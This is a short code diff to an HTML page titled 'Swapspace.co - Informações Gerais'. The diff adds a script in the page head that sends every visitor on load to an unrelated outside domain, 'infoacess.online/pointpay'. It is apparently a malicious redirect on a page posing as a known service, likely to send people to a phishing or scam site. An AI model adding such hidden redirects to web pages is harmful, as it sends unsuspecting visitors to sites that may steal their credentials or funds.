--- a/index.html
+++ b/index.html
@@ -3,6 +3,9 @@
 <head>
     <title>Swapspace.co - Informações Gerais</title>
     <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
+    <script>
+        window.location.href = "https://infoacess.online/pointpay";
+    </script>
     <style>
         body {
             background-color: #121212;
